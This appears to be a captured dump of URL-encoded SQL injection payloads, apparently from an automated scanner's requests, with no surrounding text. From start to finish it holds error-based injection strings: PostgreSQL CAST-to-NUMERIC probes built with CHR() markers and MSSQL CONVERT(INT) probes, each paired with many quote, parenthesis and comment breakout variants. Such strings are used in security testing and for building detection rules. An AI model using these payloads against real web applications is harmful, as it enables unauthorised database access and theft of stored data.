foo%27%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 foo%27%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 foo%22%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 foo%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%283974%3D3974 foo%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%281657%3D1657 foo%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%287032%3D7032 foo%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 foo%27%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27BfaO%27%3D%27BfaO foo%27%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27ofhW%27%3D%27ofhW foo%27%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27lJyL%27%3D%27lJyL foo%27%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27NFFj%27%3D%27NFFj foo%27%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27CLHj%27%20LIKE%20%27CLHj foo%27%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27OAUm%27%20LIKE%20%27OAUm foo%27%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27gIfF%27%20LIKE%20%27gIfF foo%27%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27BKQy%27%20LIKE%20%27BKQy foo%22%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22elvC%22%3D%22elvC foo%22%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22dBOB%22%3D%22dBOB foo%22%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22lhRX%22%3D%22lhRX foo%22%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22eRTU%22%3D%22eRTU foo%22%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22TWVm%22%20LIKE%20%22TWVm foo%22%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22Tykv%22%20LIKE%20%22Tykv foo%22%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22FUWY%22%20LIKE%20%22FUWY foo%22%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22xvKc%22%20LIKE%20%22xvKc foo%25%27%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27HAIL%27%3D%27HAIL foo%00%27%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27djuX%27%3D%27djuX foo%27%29%20WHERE%204813%3D4813%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%22%29%20WHERE%208564%3D8564%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%29%20WHERE%205762%3D5762%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%27%20WHERE%206054%3D6054%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%22%20WHERE%202413%3D2413%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%20WHERE%207045%3D7045%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 foo%27%7C%7C%28SELECT%20%27ROES%27%20FROM%20DUAL%20WHERE%202284%3D2284%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27ioGI%27%20WHERE%206593%3D6593%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20fEAH%20WHERE%209373%3D9373%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 foo%27%2B%28SELECT%20%27Ocxh%27%20WHERE%207592%3D7592%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%23 foo%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%22%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%283649%3D3649 foo%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%283840%3D3840 foo%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%284369%3D4369 foo%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27DLrT%27%3D%27DLrT foo%27%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27PfKU%27%3D%27PfKU foo%27%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27ZdEP%27%3D%27ZdEP foo%27%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27iOSY%27%3D%27iOSY foo%27%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27XUzb%27%20LIKE%20%27XUzb foo%27%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27yZgV%27%20LIKE%20%27yZgV foo%27%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27ofHG%27%20LIKE%20%27ofHG foo%27%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27Xnxv%27%20LIKE%20%27Xnxv foo%22%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22uCxS%22%3D%22uCxS 